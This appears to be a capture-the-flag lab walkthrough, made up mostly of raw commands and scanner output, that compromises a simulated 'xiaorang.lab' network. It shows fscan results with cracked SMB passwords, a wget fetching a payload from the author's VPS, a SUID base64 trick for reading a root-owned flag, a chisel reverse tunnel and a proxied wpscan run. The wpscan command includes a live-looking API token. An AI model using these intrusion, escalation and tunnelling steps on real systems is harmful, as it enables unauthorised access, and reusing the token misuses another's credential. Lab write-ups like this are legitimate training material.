1
❯ ./fscan -h 39.99.226.232
2
┌──────────────────────────────────────────────┐
3
│    ___                              _        │
4
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
5
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
6
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
7
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
8
└──────────────────────────────────────────────┘
9
      Fscan Version: 2.0.1
10

11
[717ms]     已选择服务扫描模式
12
[717ms]     开始信息扫描
13
[717ms]     最终有效主机数量: 1
14
[717ms]     开始主机扫描
15
[718ms]     使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle
16
[718ms]     有效端口数量: 233
17
[766ms] [*] 端口开放 39.99.226.232:6379
18
[772ms] [*] 端口开放 39.99.226.232:22
19
[772ms] [*] 端口开放 39.99.226.232:21
20
[3.7s]     扫描完成, 发现 3 个开放端口
21
[3.7s]     存活端口数量: 3
22
[3.7s]     开始漏洞扫描
23
[4.0s] [+] FTP服务 39.99.226.232:21 匿名登录成功!
24
[6.8s] [+] Redis 39.99.226.232:6379 发现未授权访问 文件位置:/usr/local/redis/db/dump.rdb
25
[6.8s] [+] Redis无密码连接成功: 39.99.226.232:6379
26
[6.8s]     扫描已完成: 3/3

1
python -c 'import pty; pty.spawn("/bin/bash")'

1
python3 -m http.server 2000
2
wget http://43.134.9.57:2000/11 -O /tmp

1
sh-4.2$ find / -user root -perm -4000 -print 2> result.txt
2
/usr/sbin/pam_timestamp_check
3
/usr/sbin/usernetctl
4
/usr/sbin/unix_chkpwd
5
/usr/bin/at
6
/usr/bin/chfn
7
/usr/bin/gpasswd
8
/usr/bin/passwd
9
/usr/bin/chage
10
/usr/bin/base64
11
/usr/bin/umount
12
/usr/bin/su
13
/usr/bin/chsh
14
/usr/bin/sudo
15
/usr/bin/crontab
16
/usr/bin/newgrp
17
/usr/bin/mount
18
/usr/bin/pkexec
19
/usr/libexec/dbus-1/dbus-daemon-launch-helper
20
/usr/lib/polkit-1/polkit-agent-helper-1

1
sudo install -m =xs $(which base64) .
2

3
LFILE=file_to_read
4
./base64 "$LFILE" | base64 --decode

1
base64 "/home/redis/flag/flag01" | base64 --decode

1
sh-4.2$ ./FScan_2.0.1_linux_x64 -h 172.22.2.0/24
2
┌──────────────────────────────────────────────┐
3
│    ___                              _        │
4
│   / _ \     ___  ___ _ __ __ _  ___| | __    │
5
│  / /_\/____/ __|/ __| '__/ _` |/ __| |/ /    │
6
│ / /_\\_____\__ \ (__| | | (_| | (__|   <     │
7
│ \____/     |___/\___|_|  \__,_|\___|_|\_\    │
8
└──────────────────────────────────────────────┘
9
      Fscan Version: 2.0.1
10

11
[1.9s]     已选择服务扫描模式
12
[1.9s]     开始信息扫描
13
[1.9s]     CIDR范围: 172.22.2.0-172.22.2.255
14
[1.9s]     generate_ip_range_full
15
[1.9s]     解析CIDR 172.22.2.0/24 -> IP范围 172.22.2.0-172.22.2.255
16
[1.9s]     最终有效主机数量: 256
17
[1.9s]     开始主机扫描
18
[1.9s]     使用服务插件: activemq, cassandra, elasticsearch, findnet, ftp, imap, kafka, ldap, memcached, modbus, mongodb, ms17010, mssql, mysql, neo4j, netbios, oracle, pop3, postgres, rabbitmq, rdp, redis, rsync, smb, smb2, smbghost, smtp, snmp, ssh, telnet, vnc, webpoc, webtitle
19
[1.9s]     正在尝试无监听ICMP探测...
20
[1.9s]     ICMP连接失败: dial ip4:icmp 127.0.0.1: socket: operation not permitted
21
[1.9s]     当前用户权限不足,无法发送ICMP包
22
[1.9s]     切换为PING方式探测...
23
[2.9s] [*] 目标 172.22.2.16     存活 (ICMP)
24
[3.0s] [*] 目标 172.22.2.18     存活 (ICMP)
25
[5.0s] [*] 目标 172.22.2.3      存活 (ICMP)
26
[5.0s] [*] 目标 172.22.2.34     存活 (ICMP)
27
[6.0s] [*] 目标 172.22.2.7      存活 (ICMP)
28
[7.9s]     存活主机数量: 5
29
[7.9s]     有效端口数量: 233
30
[7.9s] [*] 端口开放 172.22.2.16:135
31
[7.9s] [*] 端口开放 172.22.2.16:139
32
[7.9s] [*] 端口开放 172.22.2.16:80
33
[7.9s] [*] 端口开放 172.22.2.3:445
34
[7.9s] [*] 端口开放 172.22.2.3:389
35
[7.9s] [*] 端口开放 172.22.2.3:135
36
[7.9s] [*] 端口开放 172.22.2.3:139
37
[7.9s] [*] 端口开放 172.22.2.3:88
38
[7.9s] [*] 端口开放 172.22.2.16:1433
39
[7.9s] [*] 端口开放 172.22.2.18:80
40
[7.9s] [*] 端口开放 172.22.2.18:22
41
[7.9s] [*] 端口开放 172.22.2.16:445
42
[7.9s] [*] 端口开放 172.22.2.18:445
43
[7.9s] [*] 端口开放 172.22.2.18:139
44
[7.9s] [*] 端口开放 172.22.2.34:135
45
[7.9s] [*] 端口开放 172.22.2.34:445
46
[7.9s] [*] 端口开放 172.22.2.34:139
47
[7.9s] [*] 端口开放 172.22.2.7:80
48
[7.9s] [*] 端口开放 172.22.2.7:22
49
[7.9s] [*] 端口开放 172.22.2.7:21
50
[7.9s] [*] 端口开放 172.22.2.7:6379
51
[10.9s]     扫描完成, 发现 21 个开放端口
52
[10.9s]     存活端口数量: 21
53
[10.9s]     开始漏洞扫描
54
[11.0s] [*] NetInfo 扫描结果
55
目标主机: 172.22.2.16
56
主机名: MSSQLSERVER
57
发现的网络接口:
58
   IPv4地址:
59
      └─ 172.22.2.16
60
[11.0s] [*] NetInfo 扫描结果
61
目标主机: 172.22.2.3
62
主机名: DC
63
发现的网络接口:
64
   IPv4地址:
65
      └─ 172.22.2.3
66
[11.0s] [*] 网站标题 http://172.22.2.16        状态码:404 长度:315    标题:Not Found
67
[11.0s] [*] NetInfo 扫描结果
68
目标主机: 172.22.2.34
69
主机名: CLIENT01
70
发现的网络接口:
71
   IPv4地址:
72
      └─ 172.22.2.34
73
[11.0s]     系统信息 172.22.2.16 [Windows Server 2016 Datacenter 14393]
74
[11.0s] [+] NetBios 172.22.2.16     MSSQLSERVER.xiaorang.lab            Windows Server 2016 Datacenter 14393
75
[11.0s]     系统信息 172.22.2.3 [Windows Server 2016 Datacenter 14393]
76
[11.0s] [*] 网站标题 http://172.22.2.7         状态码:200 长度:4833   标题:Welcome to CentOS
77
[11.1s] [+] NetBios 172.22.2.34     XIAORANG\CLIENT01
78
[11.1s] [+] 172.22.2.34 CVE-2020-0796 SmbGhost Vulnerable
79
[11.1s]     POC加载完成: 总共387个，成功387个，失败0个
80
[11.1s] [+] NetBios 172.22.2.3      DC:DC.xiaorang.lab               Windows Server 2016 Datacenter 14393
81
[11.1s] [+] NetBios 172.22.2.18     WORKGROUP\UBUNTU-WEB02
82
[11.2s] [+] FTP服务 172.22.2.7:21 匿名登录成功!
83
[11.3s] [+] SMB认证成功 172.22.2.18:445 administrator:admin123
84
[11.5s]     SMB2共享信息 172.22.2.18:445 administrator Pass:P@ssword123 共享:[print$ IPC$]
85
[11.5s] [+] SMB认证成功 172.22.2.16:445 admin:admin123
86
[11.5s]     SMB2共享信息 172.22.2.18:445 administrator Pass:pass@123 共享:[print$ IPC$]
87
[11.6s]     SMB2共享信息 172.22.2.18:445 administrator Pass:pass123 共享:[print$ IPC$]
88
[11.6s]     SMB2共享信息 172.22.2.18:445 administrator Pass:root 共享:[print$ IPC$]
89
[11.7s]     SMB2共享信息 172.22.2.18:445 administrator Pass:Password 共享:[print$ IPC$]
90
[11.7s]     SMB2共享信息 172.22.2.18:445 administrator Pass:admin 共享:[print$ IPC$]
91
[11.8s]     SMB2共享信息 172.22.2.18:445 administrator Pass:123456 共享:[print$ IPC$]
92
[11.8s]     SMB2共享信息 172.22.2.18:445 administrator Pass:admin123 共享:[print$ IPC$]
93
[11.8s]     SMB2共享信息 172.22.2.18:445 administrator Pass: 共享:[print$ IPC$]
94
[11.8s]     SMB2共享信息 172.22.2.18:445 administrator Pass:password 共享:[print$ IPC$]
95
[12.1s]     SMB2共享信息 172.22.2.16:445 admin Pass:123456 共享:[ADMIN$ C$ fileshare IPC$]
96
[12.1s]     SMB2共享信息 172.22.2.16:445 admin Pass:admin123 共享:[ADMIN$ C$ fileshare IPC$]
97
[12.1s]     SMB2共享信息 172.22.2.16:445 admin Pass:root 共享:[ADMIN$ C$ fileshare IPC$]
98
[12.2s]     SMB2共享信息 172.22.2.16:445 admin Pass: 共享:[ADMIN$ C$ fileshare IPC$]
99
[15.4s] [*] 网站标题 http://172.22.2.18        状态码:200 长度:57738  标题:又一个WordPress站点
100
[55.5s]     扫描已完成: 37/37

1
172.22.2.3  DC  Windows Server 2016 Datacenter 14393
2
172.22.2.16  MSSQLSERVER  Windows Server 2016 Datacenter 14393
3
172.22.2.34  CLIENT01  Windows 客户端，NetBios: XIAORANG\CLIENT01
4
172.22.2.18  UBUNTU-WEB02  Linux 主机，运行 WordPress
5
172.22.2.7  未命名  CentOS，开启 FTP 匿名访问

1
# server 在我vps上
2
./chisel server -p 8000 --reverse
3

4

5
# client
6
./chisel client 43.134.9.57:8000 R:0.0.0.0:1080:socks

1
proxychains4 wpscan --url http://172.22.2.18/ --api-token

1
┌──(root㉿kali)-[/mnt/hgfs/shared]
2
└─# proxychains4 wpscan --url http://172.22.2.18/ --api-token ba4cRMPJWGOg65GtEJZ5F780PRttT3o9sd8CABdBq7U
3
[proxychains] config file found: /etc/proxychains.conf
4
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
5
[proxychains] DLL init: proxychains-ng 4.17
6
_______________________________________________________________
7
         __          _______   _____
8
         \ \        / /  __ \ / ____|
9
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
10
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
11
            \  /\  /  | |     ____) | (__| (_| | | | |
12
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|
13

14
         WordPress Security Scanner by the WPScan Team
15
                         Version 3.8.28
16
       Sponsored by Automattic - https://automattic.com/
17
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
18
_______________________________________________________________
19

20
[proxychains] Strict chain  ...  43.134.9.57:1080  ...  172.22.2.18:80  ...  OK
21
[proxychains] Strict chain  ...  43.134.9.57:1080  ...  wpscan.com:443  ...  OK
22
[+] URL: http://172.22.2.18/ [172.22.2.18]
23
[+] Started: Thu Jul 31 13:24:54 2025
24

25
[proxychains] Strict chain  ...  43.134.9.57:1080  ...  172.22.2.18:80  ...  OK
26
Interesting Finding(s):
27

28
[+] Headers
29
 | Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
30
 | Found By: Headers (Passive Detection)
31
 | Confidence: 100%
32

33
[+] XML-RPC seems to be enabled: http://172.22.2.18/xmlrpc.php
34
 | Found By: Direct Access (Aggressive Detection)
35
 | Confidence: 100%
36
 | References:
37
 |  - http://codex.wordpress.org/XML-RPC_Pingback_API
38
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner/
39
 |  - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos/
40
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login/
41
 |  - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access/
42

43
[+] WordPress readme found: http://172.22.2.18/readme.html
44
 | Found By: Direct Access (Aggressive Detection)
45
 | Confidence: 100%
46

47
[+] Upload directory has listing enabled: http://172.22.2.18/wp-content/uploads/
48
 | Found By: Direct Access (Aggressive Detection)
49
 | Confidence: 100%
50

51
[+] The external WP-Cron seems to be enabled: http://172.22.2.18/wp-cron.php
52
 | Found By: Direct Access (Aggressive Detection)
53
 | Confidence: 60%
54
 | References:
55
 |  - https://www.iplocation.net/defend-wordpress-from-ddos
56
 |  - https://github.com/wpscanteam/wpscan/issues/1299
57

58
[+] WordPress version 6.0 identified (Insecure, released on 2022-05-24).
59
 | Found By: Rss Generator (Passive Detection)
60
 |  - http://172.22.2.18/index.php/feed/, <generator>https://wordpress.org/?v=6.0</generator>
61
 |  - http://172.22.2.18/index.php/comments/feed/, <generator>https://wordpress.org/?v=6.0</generator>
62
 |
63
 | [!] 33 vulnerabilities identified:
64
 |
65
 | [!] Title: WP < 6.0.2 - Reflected Cross-Site Scripting
66
 |     Fixed in: 6.0.2
67
 |     References:
68
 |      - https://wpscan.com/vulnerability/622893b0-c2c4-4ee7-9fa1-4cecef6e36be
69
 |      - https://wordpress.org/news/2022/08/wordpress-6-0-2-security-and-maintenance-release/
70
 |
71
 | [!] Title: WP < 6.0.2 - Authenticated Stored Cross-Site Scripting
72
 |     Fixed in: 6.0.2
73
 |     References:
74
 |      - https://wpscan.com/vulnerability/3b1573d4-06b4-442b-bad5-872753118ee0
75
 |      - https://wordpress.org/news/2022/08/wordpress-6-0-2-security-and-maintenance-release/
76
 |
77
 | [!] Title: WP < 6.0.2 - SQLi via Link API
78
 |     Fixed in: 6.0.2
79
 |     References:
80
 |      - https://wpscan.com/vulnerability/601b0bf9-fed2-4675-aec7-fed3156a022f
81
 |      - https://wordpress.org/news/2022/08/wordpress-6-0-2-security-and-maintenance-release/
82
 |
83
 | [!] Title: WP < 6.0.3 - Stored XSS via wp-mail.php
84
 |     Fixed in: 6.0.3
85
 |     References:
86
 |      - https://wpscan.com/vulnerability/713bdc8b-ab7c-46d7-9847-305344a579c4
87
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
88
 |      - https://github.com/WordPress/wordpress-develop/commit/abf236fdaf94455e7bc6e30980cf70401003e283
89
 |
90
 | [!] Title: WP < 6.0.3 - Open Redirect via wp_nonce_ays
91
 |     Fixed in: 6.0.3
92
 |     References:
93
 |      - https://wpscan.com/vulnerability/926cd097-b36f-4d26-9c51-0dfab11c301b
94
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
95
 |      - https://github.com/WordPress/wordpress-develop/commit/506eee125953deb658307bb3005417cb83f32095
96
 |
97
 | [!] Title: WP < 6.0.3 - Email Address Disclosure via wp-mail.php
98
 |     Fixed in: 6.0.3
99
 |     References:
100
 |      - https://wpscan.com/vulnerability/c5675b59-4b1d-4f64-9876-068e05145431
101
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
102
 |      - https://github.com/WordPress/wordpress-develop/commit/5fcdee1b4d72f1150b7b762ef5fb39ab288c8d44
103
 |
104
 | [!] Title: WP < 6.0.3 - Reflected XSS via SQLi in Media Library
105
 |     Fixed in: 6.0.3
106
 |     References:
107
 |      - https://wpscan.com/vulnerability/cfd8b50d-16aa-4319-9c2d-b227365c2156
108
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
109
 |      - https://github.com/WordPress/wordpress-develop/commit/8836d4682264e8030067e07f2f953a0f66cb76cc
110
 |
111
 | [!] Title: WP < 6.0.3 - CSRF in wp-trackback.php
112
 |     Fixed in: 6.0.3
113
 |     References:
114
 |      - https://wpscan.com/vulnerability/b60a6557-ae78-465c-95bc-a78cf74a6dd0
115
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
116
 |      - https://github.com/WordPress/wordpress-develop/commit/a4f9ca17fae0b7d97ff807a3c234cf219810fae0
117
 |
118
 | [!] Title: WP < 6.0.3 - Stored XSS via the Customizer
119
 |     Fixed in: 6.0.3
120
 |     References:
121
 |      - https://wpscan.com/vulnerability/2787684c-aaef-4171-95b4-ee5048c74218
122
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
123
 |      - https://github.com/WordPress/wordpress-develop/commit/2ca28e49fc489a9bb3c9c9c0d8907a033fe056ef
124
 |
125
 | [!] Title: WP < 6.0.3 - Stored XSS via Comment Editing
126
 |     Fixed in: 6.0.3
127
 |     References:
128
 |      - https://wpscan.com/vulnerability/02d76d8e-9558-41a5-bdb6-3957dc31563b
129
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
130
 |      - https://github.com/WordPress/wordpress-develop/commit/89c8f7919460c31c0f259453b4ffb63fde9fa955
131
 |
132
 | [!] Title: WP < 6.0.3 - Content from Multipart Emails Leaked
133
 |     Fixed in: 6.0.3
134
 |     References:
135
 |      - https://wpscan.com/vulnerability/3f707e05-25f0-4566-88ed-d8d0aff3a872
136
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
137
 |      - https://github.com/WordPress/wordpress-develop/commit/3765886b4903b319764490d4ad5905bc5c310ef8
138
 |
139
 | [!] Title: WP < 6.0.3 - SQLi in WP_Date_Query
140
 |     Fixed in: 6.0.3
141
 |     References:
142
 |      - https://wpscan.com/vulnerability/1da03338-557f-4cb6-9a65-3379df4cce47
143
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
144
 |      - https://github.com/WordPress/wordpress-develop/commit/d815d2e8b2a7c2be6694b49276ba3eee5166c21f
145
 |
146
 | [!] Title: WP < 6.0.3 - Stored XSS via RSS Widget
147
 |     Fixed in: 6.0.3
148
 |     References:
149
 |      - https://wpscan.com/vulnerability/58d131f5-f376-4679-b604-2b888de71c5b
150
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
151
 |      - https://github.com/WordPress/wordpress-develop/commit/929cf3cb9580636f1ae3fe944b8faf8cca420492
152
 |
153
 | [!] Title: WP < 6.0.3 - Data Exposure via REST Terms/Tags Endpoint
154
 |     Fixed in: 6.0.3
155
 |     References:
156
 |      - https://wpscan.com/vulnerability/b27a8711-a0c0-4996-bd6a-01734702913e
157
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
158
 |      - https://github.com/WordPress/wordpress-develop/commit/ebaac57a9ac0174485c65de3d32ea56de2330d8e
159
 |
160
 | [!] Title: WP < 6.0.3 - Multiple Stored XSS via Gutenberg
161
 |     Fixed in: 6.0.3
162
 |     References:
163
 |      - https://wpscan.com/vulnerability/f513c8f6-2e1c-45ae-8a58-36b6518e2aa9
164
 |      - https://wordpress.org/news/2022/10/wordpress-6-0-3-security-release/
165
 |      - https://github.com/WordPress/gutenberg/pull/45045/files
166
 |
167
 | [!] Title: WP <= 6.2 - Unauthenticated Blind SSRF via DNS Rebinding
168
 |     References:
169
 |      - https://wpscan.com/vulnerability/c8814e6e-78b3-4f63-a1d3-6906a84c1f11
170
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-3590
171
 |      - https://blog.sonarsource.com/wordpress-core-unauthenticated-blind-ssrf/
172
 |
173
 | [!] Title: WP < 6.2.1 - Directory Traversal via Translation Files
174
 |     Fixed in: 6.0.4
175
 |     References:
176
 |      - https://wpscan.com/vulnerability/2999613a-b8c8-4ec0-9164-5dfe63adf6e6
177
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-2745
178
 |      - https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/
179
 |
180
 | [!] Title: WP < 6.2.1 - Thumbnail Image Update via CSRF
181
 |     Fixed in: 6.0.4
182
 |     References:
183
 |      - https://wpscan.com/vulnerability/a03d744a-9839-4167-a356-3e7da0f1d532
184
 |      - https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/
185
 |
186
 | [!] Title: WP < 6.2.1 - Contributor+ Stored XSS via Open Embed Auto Discovery
187
 |     Fixed in: 6.0.4
188
 |     References:
189
 |      - https://wpscan.com/vulnerability/3b574451-2852-4789-bc19-d5cc39948db5
190
 |      - https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/
191
 |
192
 | [!] Title: WP < 6.2.2 - Shortcode Execution in User Generated Data
193
 |     Fixed in: 6.0.5
194
 |     References:
195
 |      - https://wpscan.com/vulnerability/ef289d46-ea83-4fa5-b003-0352c690fd89
196
 |      - https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/
197
 |      - https://wordpress.org/news/2023/05/wordpress-6-2-2-security-release/
198
 |
199
 | [!] Title: WP < 6.2.1 - Contributor+ Content Injection
200
 |     Fixed in: 6.0.4
201
 |     References:
202
 |      - https://wpscan.com/vulnerability/1527ebdb-18bc-4f9d-9c20-8d729a628670
203
 |      - https://wordpress.org/news/2023/05/wordpress-6-2-1-maintenance-security-release/
204
 |
205
 | [!] Title: WP 5.6-6.3.1 - Contributor+ Stored XSS via Navigation Block
206
 |     Fixed in: 6.0.6
207
 |     References:
208
 |      - https://wpscan.com/vulnerability/cd130bb3-8d04-4375-a89a-883af131ed3a
209
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-38000
210
 |      - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
211
 |
212
 | [!] Title: WP 5.6-6.3.1 - Reflected XSS via Application Password Requests
213
 |     Fixed in: 6.0.6
214
 |     References:
215
 |      - https://wpscan.com/vulnerability/da1419cc-d821-42d6-b648-bdb3c70d91f2
216
 |      - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
217
 |
218
 | [!] Title: WP < 6.3.2 - Denial of Service via Cache Poisoning
219
 |     Fixed in: 6.0.6
220
 |     References:
221
 |      - https://wpscan.com/vulnerability/6d80e09d-34d5-4fda-81cb-e703d0e56e4f
222
 |      - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
223
 |
224
 | [!] Title: WP < 6.3.2 - Subscriber+ Arbitrary Shortcode Execution
225
 |     Fixed in: 6.0.6
226
 |     References:
227
 |      - https://wpscan.com/vulnerability/3615aea0-90aa-4f9a-9792-078a90af7f59
228
 |      - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
229
 |
230
 | [!] Title: WP < 6.3.2 - Contributor+ Comment Disclosure
231
 |     Fixed in: 6.0.6
232
 |     References:
233
 |      - https://wpscan.com/vulnerability/d35b2a3d-9b41-4b4f-8e87-1b8ccb370b9f
234
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-39999
235
 |      - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
236
 |
237
 | [!] Title: WP < 6.3.2 - Unauthenticated Post Author Email Disclosure
238
 |     Fixed in: 6.0.6
239
 |     References:
240
 |      - https://wpscan.com/vulnerability/19380917-4c27-4095-abf1-eba6f913b441
241
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-5561
242
 |      - https://wpscan.com/blog/email-leak-oracle-vulnerability-addressed-in-wordpress-6-3-2/
243
 |      - https://wordpress.org/news/2023/10/wordpress-6-3-2-maintenance-and-security-release/
244
 |
245
 | [!] Title: WordPress < 6.4.3 - Deserialization of Untrusted Data
246
 |     Fixed in: 6.0.7
247
 |     References:
248
 |      - https://wpscan.com/vulnerability/5e9804e5-bbd4-4836-a5f0-b4388cc39225
249
 |      - https://wordpress.org/news/2024/01/wordpress-6-4-3-maintenance-and-security-release/
250
 |
251
 | [!] Title: WordPress < 6.4.3 - Admin+ PHP File Upload
252
 |     Fixed in: 6.0.7
253
 |     References:
254
 |      - https://wpscan.com/vulnerability/a8e12fbe-c70b-4078-9015-cf57a05bdd4a
255
 |      - https://wordpress.org/news/2024/01/wordpress-6-4-3-maintenance-and-security-release/
256
 |
257
 | [!] Title: WP < 6.5.2 - Unauthenticated Stored XSS
258
 |     Fixed in: 6.0.8
259
 |     References:
260
 |      - https://wpscan.com/vulnerability/1a5c5df1-57ee-4190-a336-b0266962078f
261
 |      - https://wordpress.org/news/2024/04/wordpress-6-5-2-maintenance-and-security-release/
262
 |
263
 | [!] Title: WordPress < 6.5.5 - Contributor+ Stored XSS in HTML API
264
 |     Fixed in: 6.0.9
265
 |     References:
266
 |      - https://wpscan.com/vulnerability/2c63f136-4c1f-4093-9a8c-5e51f19eae28
267
 |      - https://wordpress.org/news/2024/06/wordpress-6-5-5/
268
 |
269
 | [!] Title: WordPress < 6.5.5 - Contributor+ Stored XSS in Template-Part Block
270
 |     Fixed in: 6.0.9
271
 |     References:
272
 |      - https://wpscan.com/vulnerability/7c448f6d-4531-4757-bff0-be9e3220bbbb
273
 |      - https://wordpress.org/news/2024/06/wordpress-6-5-5/
274
 |
275
 | [!] Title: WordPress < 6.5.5 - Contributor+ Path Traversal in Template-Part Block
276
 |     Fixed in: 6.0.9
277
 |     References:
278
 |      - https://wpscan.com/vulnerability/36232787-754a-4234-83d6-6ded5e80251c
279
 |      - https://wordpress.org/news/2024/06/wordpress-6-5-5/
280

281
[+] WordPress theme in use: twentytwentytwo
282
 | Location: http://172.22.2.18/wp-content/themes/twentytwentytwo/
283
 | Last Updated: 2025-04-15T00:00:00.000Z
284
 | Readme: http://172.22.2.18/wp-content/themes/twentytwentytwo/readme.txt
285
 | [!] The version is out of date, the latest version is 2.0
286
 | Style URL: http://172.22.2.18/wp-content/themes/twentytwentytwo/style.css?ver=1.2
287
 | Style Name: Twenty Twenty-Two
288
 | Style URI: https://wordpress.org/themes/twentytwentytwo/
289
 | Description: Built on a solidly designed foundation, Twenty Twenty-Two embraces the idea that everyone deserves a...
290
 | Author: the WordPress team
291
 | Author URI: https://wordpress.org/
292
 |
293
 | Found By: Css Style In Homepage (Passive Detection)
294
 |
295
 | Version: 1.2 (80% confidence)
296
 | Found By: Style (Passive Detection)
297
 |  - http://172.22.2.18/wp-content/themes/twentytwentytwo/style.css?ver=1.2, Match: 'Version: 1.2'
298

299
[+] Enumerating All Plugins (via Passive Methods)
300
[+] Checking Plugin Versions (via Passive and Aggressive Methods)
301

302
[i] Plugin(s) Identified:
303

304
[+] wpcargo
305
 | Location: http://172.22.2.18/wp-content/plugins/wpcargo/
306
 | Last Updated: 2025-07-23T01:11:00.000Z
307
 | [!] The version is out of date, the latest version is 8.0.2
308
 |
309
 | Found By: Urls In Homepage (Passive Detection)
310
 |
311
 | [!] 6 vulnerabilities identified:
312
 |
313
 | [!] Title: WPCargo < 6.9.0 - Unauthenticated RCE
314
 |     Fixed in: 6.9.0
315
 |     References:
316
 |      - https://wpscan.com/vulnerability/5c21ad35-b2fb-4a51-858f-8ffff685de4a
317
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2021-25003
318
 |
319
 | [!] Title: WPCargo Track & Trace < 6.9.5 - Reflected Cross Site Scripting
320
 |     Fixed in: 6.9.5
321
 |     References:
322
 |      - https://wpscan.com/vulnerability/d5c6f894-6ad1-46f4-bd77-17ad9234cfc3
323
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1436
324
 |
325
 | [!] Title: WPCargo Track & Trace < 6.9.5 - Admin+ Stored Cross Site Scripting
326
 |     Fixed in: 6.9.5
327
 |     References:
328
 |      - https://wpscan.com/vulnerability/ef5aa8a7-23a7-4ce0-bb09-d9c986386114
329
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-1435
330
 |
331
 | [!] Title: WPCargo Track & Trace <= 8.0.2 - Unauthenticated SQL Injection
332
 |     References:
333
 |      - https://wpscan.com/vulnerability/f5fdb762-cbc1-4352-9ab2-cbba9d3d33e2
334
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-44004
335
 |      - https://patchstack.com/database/wordpress/plugin/wpcargo/vulnerability/wordpress-wpcargo-track-trace-plugin-7-0-6-sql-injection-vulnerability
336
 |
337
 | [!] Title: WPCargo Track & Trace <= 8.0.2 - Subscriber+ Settings Update
338
 |     References:
339
 |      - https://wpscan.com/vulnerability/b433fff9-b501-4fb3-9f04-5e18b64b0a90
340
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-54271
341
 |      - https://patchstack.com/database/wordpress/plugin/wpcargo/vulnerability/wordpress-wpcargo-track-trace-plugin-7-0-6-settings-change-vulnerability
342
 |
343
 | [!] Title: WPCargo Track & Trace <= 8.0.2 - Contributor+ Insecure Direct Object Reference
344
 |     References:
345
 |      - https://wpscan.com/vulnerability/594ae221-06b6-4bc2-b5b6-0f9bac880f7b
346
 |      - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2025-31609
347
 |      - https://patchstack.com/database/wordpress/plugin/wpcargo/vulnerability/wordpress-wpcargo-track-trace-plugin-7-0-6-insecure-direct-object-references-idor-vulnerability
348
 |
349
 | Version: 6.x.x (80% confidence)
350
 | Found By: Readme - Stable Tag (Aggressive Detection)
351
 |  - http://172.22.2.18/wp-content/plugins/wpcargo/readme.txt
352

353
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
354
[proxychains] Strict chain  ...  43.134.9.57:1080  ...  172.22.2.18:80  ...  OK?
355
[proxychains] Strict chain  ...  43.134.9.57:1080  ...  172.22.2.18:80  ...  OK
356
[proxychains] Strict chain  ...  43.134.9.57:1080  ...  172.22.2.18:80  ...  OK
357
[proxychains] Strict chain  ...  43.134.9.57:1080  ...  172.22.2.18:80  ...  OK
358
[proxychains] Strict chain  ...  43.134.9.57:1080  ...  172.22.2.18:80  ...  OK
359
[proxychains] Strict chain  ...  43.134.9.57:1080  ...  172.22.2.18:80  ...  OK                                            > (16 / 137) 11.67%  ETA: 00:00:41
360
[proxychains] Strict chain  ...  43.134.9.57:1080  ...  172.22.2.18:80  ...  OK                                            > (36 / 137) 26.27%  ETA: 00:00:20
361
 Checking Config Backups - Time: 00:00:15 <==============================================================================> (137 / 137) 100.00% Time: 00:00:15
362

363
[i] No Config Backups Found.
364

365
[proxychains] Strict chain  ...  43.134.9.57:1080  ...  wpscan.com:443  ...  OK
366
[+] WPScan DB API OK
367
 | Plan: free
368
 | Requests Done (during the scan): 3
369
 | Requests Remaining: 22
370

371
[+] Finished: Thu Jul 31 13:25:35 2025
372
